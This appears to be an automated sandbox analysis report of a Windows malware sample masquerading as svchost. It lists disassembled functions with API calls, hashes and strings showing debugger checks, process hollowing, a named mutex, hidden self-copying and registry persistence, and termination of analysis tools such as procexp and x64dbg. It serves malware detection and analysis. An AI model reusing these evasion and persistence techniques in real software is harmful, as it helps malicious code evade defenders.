                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: DebuggerPresent$CheckCurrentProcessRemote
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3920101602-0
                                                                                                                                                                                                                                                    • Opcode ID: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction ID: fa6706efff7018045034e888ddb087cff560e9e6342b679b7717749162958be6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e9bd88260ec4cc61dc4a106c2a67c42b8d4857221eedeb8770e35a2a76d82c30
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C4F03A62E0D2C3C1E7305B6598043BA6790AB79B08F014174E58D87194CFAED509AF1B
                                                                                                                                                                                                                                                    Function 00007FF6EEF242A8 Relevance: 4.5, APIs: 3, Instructions: 21synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateErrorHandleLastMutex
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4294037311-0
                                                                                                                                                                                                                                                    • Opcode ID: 7cb7a44c0d5384097fc9cae982f15e4040306c9a3300e2096f8f36d6c1bf3f53
                                                                                                                                                                                                                                                    • Instruction ID: feaee18a29dd30428daea537f3e1480e24fefdbe13376bbf909b6748b93b5c7e
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7cb7a44c0d5384097fc9cae982f15e4040306c9a3300e2096f8f36d6c1bf3f53
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E0F03022D0C6C1C2EB205B21A4043BE2360FBBA300F924434F98E836D4CFBFD4559616
                                                                                                                                                                                                                                                    Function 00007FF6EEF21050 Relevance: 3.0, APIs: 2, Instructions: 13libraryloaderCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 391 7ff6eef21050-7ff6eef2108c LoadLibraryA GetProcAddress
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,00007FF6EEF21165,?,?,?,?,?,?,00007FF6EEF2336C), ref: 00007FF6EEF21063
                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,?,?,?,00007FF6EEF21165,?,?,?,?,?,?,00007FF6EEF2336C), ref: 00007FF6EEF21078
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: AddressLibraryLoadProc
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2574300362-0
                                                                                                                                                                                                                                                    • Opcode ID: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction ID: 6fdc9ce99a5cbcd5c618257925cd3077fc4078074450e36fdd49d221b79117a7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e6198b99d5b023e326d4442bf2863252b60b3359320dbad58740b6c0f3b775
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82E07E76908A8086C720DB15F84011AB7B4FBD8794F504125EACD87B28DF3DC1698B04
                                                                                                                                                                                                                                                    Function 00007FF6EEF23A28 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 404 7ff6eef23a28-7ff6eef23a37 405 7ff6eef23a39-7ff6eef23a46 VirtualFree 404->405 406 7ff6eef23a4c-7ff6eef23a50 404->406 405->406
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                                                                                                    • Opcode ID: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction ID: 3fada1ea615d196a296f415d9f27cc7387a7326adcdbb2b2eb2513e94622b364
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c163ca7f34193cc1aec9bafbbcdec196117a86198a0a8583c7d817857ed249e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23D01222E3998282E7949B26E88976562A0FFE8B44F418035F68D835A5CF7DC0998F05

                                                                                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                                                                                    Function 00007FF6EEF21F8C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 440COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileModuleName
                                                                                                                                                                                                                                                    • String ID: .reloc$@$NtUnmapViewOfSection$ntdll
                                                                                                                                                                                                                                                    • API String ID: 514040917-3001742581
                                                                                                                                                                                                                                                    • Opcode ID: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction ID: 43c1a61b6961d95b0937543788d5a39b5d81bcb710476b82a441a44ce6f031d6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f917b2b91664f8174983d74143afff0df1ca4cc990d6240a450e42c88ea1ecf1
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A332D732A08AC186E770CB15E8547EAB7A1FBE8B44F014136EA8DC7B98DF7DD5448B05
                                                                                                                                                                                                                                                    Function 00007FF6EEF24808 Relevance: 25.7, APIs: 17, Instructions: 166memoryfileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileHeap$AllocCloseCreateHandleProcessSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 4026551389-0
                                                                                                                                                                                                                                                    • Opcode ID: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction ID: c8ce6949d1f7438bd6debb8d7119e0bfa2dbfdce12f9706dcc0668298d4238f8
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8a770a5b3bee67f21b5c919e42a7515f36236efb6f3083046f344a438eb2659a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F811F32608B81C2EB60CB55F85436AB7A0FBEDB91F114135EA8D87B68DFBDD0448B45
                                                                                                                                                                                                                                                    Function 00007FF6EEF22FE0 Relevance: 16.5, APIs: 1, Strings: 10, Instructions: 45sleepCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF244C8: CreateFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF2301B), ref: 00007FF6EEF24510
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF244C8: SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF2301B), ref: 00007FF6EEF2454D
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF244C8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF2301B), ref: 00007FF6EEF24558
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23A88: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF23020), ref: 00007FF6EEF23ACB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23A88: RegSetValueExW.ADVAPI32 ref: 00007FF6EEF23B01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23A88: RegCloseKey.ADVAPI32 ref: 00007FF6EEF23B10
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23B28: RegDeleteKeyW.ADVAPI32 ref: 00007FF6EEF23B40
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: CreateToolhelp32Snapshot.KERNEL32 ref: 00007FF6EEF23D3B
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: Process32FirstW.KERNEL32 ref: 00007FF6EEF23D6E
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: CloseHandle.KERNEL32 ref: 00007FF6EEF23D80
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: wcscmp.MSVCRT ref: 00007FF6EEF23D95
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: OpenProcess.KERNEL32 ref: 00007FF6EEF23DAB
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: TerminateProcess.KERNEL32 ref: 00007FF6EEF23DCE
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: CloseHandle.KERNEL32 ref: 00007FF6EEF23DDC
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: Process32NextW.KERNEL32 ref: 00007FF6EEF23DEF
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23D28: CloseHandle.KERNEL32 ref: 00007FF6EEF23E01
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF238B8: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,00007FF6EEF23A10), ref: 00007FF6EEF238E8
                                                                                                                                                                                                                                                    • Sleep.KERNEL32 ref: 00007FF6EEF230CA
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Close$Handle$Open$CreateFileProcessProcess32$AttributesDeleteFirstNextSleepSnapshotTerminateToolhelp32Valuewcscmp
                                                                                                                                                                                                                                                    • String ID: ProcessHacker.exe$Services$TOTALCMD.exe$autoruns.exe$idaq.exe$idaq64.exe$procexp.exe$procexp64.exe$procmon.exe$x64dbg.exe
                                                                                                                                                                                                                                                    • API String ID: 2853470409-928700279
                                                                                                                                                                                                                                                    • Opcode ID: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction ID: d4e03fcb78deae4329f58b73896814d84ce968f88e1e43dd5dd7e384ffdd4357
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0b0bc043be354159f93abb01b6a09e05dc6cbac73a69d3f51898869fbac9c2a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 80219462E19587A1EB00EB20EC513F86210AF78714FD38531F40DC72E29FAEE506835A
                                                                                                                                                                                                                                                    Function 00007FF6EEF22E30 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 32synchronizationCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Mutex$CloseHandleRelease$CreateErrorLast
                                                                                                                                                                                                                                                    • String ID: rbNSpGEsyb
                                                                                                                                                                                                                                                    • API String ID: 299056699-189039185
                                                                                                                                                                                                                                                    • Opcode ID: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction ID: c84887fdb749d869383e283e1777059b2cf33b47807c1d0435c03e64a5d759bc
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0b526b8ab80cc83fea1b656194d5a2e667a2159625c465acd692029f64747795
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF01DE23E0CA8182E7309B11F8543A96760FBBCB54F054131F94EC37A4CFBDD595960A
                                                                                                                                                                                                                                                    Function 00007FF6EEF23D28 Relevance: 13.5, APIs: 9, Instructions: 44processCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: CloseCreateFirstHandleProcess32SnapshotToolhelp32
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 1083639309-0
                                                                                                                                                                                                                                                    • Opcode ID: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction ID: dfefdabcd19521e769ab4b7fcefaf16b320051e88d5e447e76d9df08ca8c0b8c
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da147ffba4bbe02e867bb9a034ee1bddbf92c9adcecf5921264e443537e9545e
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 27211F72A0CAC681E7709B11E8483AA6360FFF8754F414234E99D836E8DF7EE449DB05
                                                                                                                                                                                                                                                    Function 00007FF6EEF23BE8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 57COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FileName$FindModulePathwcslenwcsncpy
                                                                                                                                                                                                                                                    • String ID: Unknown
                                                                                                                                                                                                                                                    • API String ID: 4220601557-1654365787
                                                                                                                                                                                                                                                    • Opcode ID: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction ID: 5243ca48a96d9416d0f069a61b7ff3a24a5e38246fab93e4dabb7b66a6185adf
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d633d74d3316cbc5f1788c5c29686994d36307cb9d56dcac6c5480779560518
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4A31F97261DAC586D770DB19E4883AAA3A0F7A8B40F400235EA8DC3B68DF7DD154CB05
                                                                                                                                                                                                                                                    Function 00007FF6EEF23978 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37fileCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23648: GetWindowsDirectoryW.KERNEL32 ref: 00007FF6EEF23688
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23648: GetVolumeInformationW.KERNELBASE ref: 00007FF6EEF23705
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF23648: wsprintfW.USER32 ref: 00007FF6EEF237A6
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: SHGetFolderPathW.SHELL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23811
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23826
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23839
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: CreateDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23849
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: SetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF2385C
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23871
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23884
                                                                                                                                                                                                                                                      • Part of subcall function 00007FF6EEF237C8: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6EEF239AD), ref: 00007FF6EEF23899
                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32 ref: 00007FF6EEF239BD
                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32 ref: 00007FF6EEF239C8
                                                                                                                                                                                                                                                    • CopyFileW.KERNEL32 ref: 00007FF6EEF239E1
                                                                                                                                                                                                                                                    • SetFileAttributesW.KERNEL32 ref: 00007FF6EEF239F9
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Filelstrcat$AttributesDirectory$CopyCreateDeleteFolderInformationModuleNamePathVolumeWindowswsprintf
                                                                                                                                                                                                                                                    • String ID: Services
                                                                                                                                                                                                                                                    • API String ID: 3209240227-2319745855
                                                                                                                                                                                                                                                    • Opcode ID: 1074f6ef554375e97d4287a4ef601b0a6f9d827b68865963729c5c23ed57852f
                                                                                                                                                                                                                                                    • Instruction ID: 7db442f2163a5c5597f5fb4ac594eb9164e92f782ef0053d66b503d0c9cb6dfe
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1074f6ef554375e97d4287a4ef601b0a6f9d827b68865963729c5c23ed57852f
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D6016162A195C3A3EB60DB24E8513EA5360FBB8744F814432E24DC75A4EF6ED209CB49
                                                                                                                                                                                                                                                    Function 00007FF6EEF23A88 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29registryCOMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000002.00000002.3071563037.00007FF6EEF21000.00000020.00000400.00020000.00000000.sdmp, Offset: 00007FF6EEF20000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071509296.00007FF6EEF20000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071619471.00007FF6EEF25000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071675296.00007FF6EEF27000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000002.00000002.3071732091.00007FF6EEF28000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff6eef20000_svchost.jbxd
                                                                                                                                                                                                                                                    Similarity
